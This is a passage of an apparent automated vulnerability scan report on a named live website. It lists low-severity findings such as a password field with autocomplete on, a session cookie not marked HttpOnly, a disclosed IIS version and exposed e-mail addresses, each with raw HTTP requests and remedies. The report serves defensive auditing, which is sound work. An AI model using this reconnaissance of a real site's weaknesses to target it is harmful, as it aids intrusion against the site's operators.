Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response …

5.6. /megazin http://www.tariel.co.il/megazin

Request
GET /megazin HTTP/1.1
Referer: http://www.tariel.co.il/shamaim
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate



Response …

5.7. /shamaim http://www.tariel.co.il/shamaim

Request
GET /shamaim HTTP/1.1
Referer: http://www.tariel.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response …



6. Auto Complete Enabled

"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

1 TOTAL, LOW, 1 CONFIRMED

Impact Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.

Actions to Take
1. Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
2. Find all instances of inputs that store private data and disable autocomplete. Fields that contain data such as credit card numbers or CCV codes should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
3. Re-scan the application after addressing the identified issues to ensure all of the fixes have been applied properly.

Required Skills for Successful Exploitation Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References Using AutoComplete in HTML Forms

Classification CWE-16 WASC-15

6.1. / CONFIRMED http://www.tariel.co.il/?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage=

Identified Field Name Password

Request
GET /?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage= HTTP/1.1
Referer: http://www.tariel.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate



Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 14:33:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1015369
Content-Type: text/html; Charset=UTF-8
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <!-- Daronet DBS2004 12/03/2014 11:32:00 -->

<head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="index,follow"> <meta http-equiv="X-UA-Compatible" content="IE=7, IE=9"> <title>‫<םיהוכ‬/title> <base href="http://www.tariel.co.il/"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid=4122" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; var sRatingMsg = "‫והיות‬ ‫;" י‬ var sOneStarMsg = "1 ‫;"ביבכ‬ var sTwoStarsMsg = "2 ‫;"ביבכוכ‬ var sThreeStarsMsg = "3 ‫;"ביבכוכ‬ var sFourStarsMsg = "4 ‫;"ביבכוכ‬ var sFiveStarsMsg = "5 ‫;"ביבכוכ‬ var c_styles = {}; var c_menus = {}; var c_hideTimeout = 500; // 1000==1 second var c_subShowTimeout = 250; var c_keepHighlighted = true; var c_findCURRENT = false; // find the item linking to the current page and apply it the CURRENT st …



7. Cookie Not Marked As HttpOnly

Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

1 TOTAL, LOW, 1 CONFIRMED

Impact During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.

Actions to Take
1. See the remedy for solution.
2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)

Remedy Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References OWASP HTTPOnly Cookies MSDN - ASP.NET HTTPOnly Cookies

Classification CWE-16 CAPEC-107 WASC-15

7.1. / CONFIRMED http://www.tariel.co.il/

Identified Cookie ASPSESSIONIDCCCTRQCB

Request
GET / HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 14:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 48760
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; path=/
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://w …



8. Forbidden Resource

Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

1 TOTAL, INFORMATION, 1 CONFIRMED

Impact This issue is reported as additional information only. There is no direct impact arising from this issue.

8.1. /_Uploads/dbsBanners/ CONFIRMED http://www.tariel.co.il/_Uploads/dbsBanners/

Request
GET /_Uploads/dbsBanners/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 26 May 2014 14:33:07 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>



9. E-mail Address Disclosure

Netsparker found e-mail addresses on the web site.

1 TOTAL INFORMATION

Impact E-mail addresses discovered within the application can be used by both spam email engines and also brute-force tools. Furthermore, valid email addresses may lead to social engineering attacks.

Remedy Use generic email addresses such as contact@ or info@ for general communications and remove user/people-specific e-mail addresses from the website; should this be required, use submission forms for this purpose.

External References Wikipedia - E-Mail Spam

Classification OWASP A6 PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13

9.1. / http://www.tariel.co.il/

Found E-mails brian@cherne.net support@daronet.com

Request
GET / HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response
… ml> * * @param f onMouseOver function || An object with configuration options * @param g onMouseOut function || Nothing (use configuration options object) * @author Brian Cherne <brian@cherne.net> */ (function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:1,interval:0,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev) {cX=ev.pageX;cY=ev.pageY; … * * Daronet Ltd. * * www.daronet.com * * <support@daronet.com> * *********************************************************************************/--> </body> </html>



10. IIS Version Disclosure

Netsparker identified that the target web server is disclosing the IIS version in its HTTP response. This information might help an attacker gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

1 TOTAL, INFORMATION

Impact An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Remedy Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Remedy References URLScan RemoveServerHeader Directive

10.1. /sitemap.xml http://www.tariel.co.il/sitemap.xml

Extracted Version Microsoft-IIS/6.0

Request
GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 14:33:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 639
Content-Type: text/xml; Charset=utf-8
Cache-control: private

<?xml version="1.0" encoding="utf-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap><loc>http://www.tariel.co.il/CategoriesMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/ItemsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/EventsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/GalleryMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/ForumsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
</sitemapindex>



11. Sitemap Identified

Netsparker identified a Sitemap file on the target web site. This issue is reported as extra information.

1 TOTAL, INFORMATION

Impact This issue is reported as additional information only. There is no direct impact arising from this issue.

11.1. /sitemap.xml http://www.tariel.co.il/sitemap.xml

Request
GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 14:33:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 639
Content-Type: text/xml; Charset=utf-8
Cache-control: private

<?xml version="1.0" encoding="utf-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap><loc>http://www.tariel.co.il/CategoriesMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/ItemsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/EventsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/GalleryMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
<sitemap><loc>http://www.tariel.co.il/ForumsMap.xml</loc><lastmod>2014-05-26</lastmod></sitemap>
</sitemapindex>



12. Robots.txt Identified

Netsparker identified a Robots.txt file with potentially sensitive content.

1 TOTAL, INFORMATION, 1 CONFIRMED

Impact Depending on the content of the file, an attacker might discover hidden directories. Ensure you have nothing sensitive exposed within this file, such as the path of the administration panel.

Remedy If disallowed paths are sensitive, do not write them in the robots.txt, and ensure they are correctly protected by means of authentication.

12.1. /robots.txt CONFIRMED http://www.tariel.co.il/robots.txt

Interesting Robots.txt Entries Sitemap: /sitemap.xml

Request
GET /robots.txt HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Content-Length: 38
Content-Type: text/plain
Last-Modified: Mon, 25 May 2009 11:04:46 GMT
Accept-Ranges: bytes
ETag: "1f1429d28ddc91:917"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 26 May 2014 14:33:11 GMT

User-agent: *
Sitemap: /sitemap.xml
